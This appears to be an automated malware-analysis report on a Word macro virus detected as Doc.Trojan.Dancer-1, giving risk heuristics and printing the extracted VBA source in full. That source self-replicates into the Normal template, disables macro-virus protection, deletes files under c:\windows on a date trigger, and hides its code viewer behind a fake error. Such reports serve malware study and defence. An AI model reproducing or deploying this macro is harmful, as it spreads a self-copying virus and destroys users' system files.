MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains legacy WordBasic macro markers and a VBA AutoOpen macro. The AutoOpen macro attempts to export and import VBA components to a file named 'dancer.wav' and writes a value to the registry key 'HKEY_CURRENT_USER\dancer'. This suggests an attempt to obfuscate or establish persistence. The presence of legacy macro markers and the specific actions within the AutoOpen macro indicate a potentially older or custom malware variant.
Heuristics 5
-
ClamAV: Doc.Trojan.Dancer-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Dancer-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1196 bytes |
SHA-256: cbefb7860e260d0a7787967d0d97a32b7c46f169f416439926ecda30ba249618 |
|||
|
Detection
ClamAV:
Doc.Trojan.Dancer-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "dancer"
Sub AutoOpen()
On Error Resume Next
Options.VirusProtection = False
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\dancer", "dancer") = False) Then
ActiveDocument.VBProject.VBComponents("dancer").Export "c:\dancer.wav"
NormalTemplate.VBProject.VBComponents.Import ("c:\dancer.wav")
System.PrivateProfileString("", "HKEY_CURRENT_USER\dancer", "dancer") = True
ElseIf ActiveDocument.VBProject.VBComponents.Item("dancer").Name <> "dancer" Then
ActiveDocument.VBProject.VBComponents.Import ("c:\dancer.wav")
End If
If (Day(Now()) = 15) And Minute(Now()) = 29 Then
ActiveDocument.PrintOut
ElseIf (Day(Now()) = 13 And WeekDay(Now()) = 13) Then
Kill "c:\windows\*.*"
End If
ActiveDocument.Save
End Sub
Sub ToolsMacro()
End Sub
Sub FileTemplates()
End Sub
Sub ViewVBCode()
MsgBox "Caught C exception: exception access_violation trapped at 1b:774a50e5", vbOKOnly + vbCritical
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.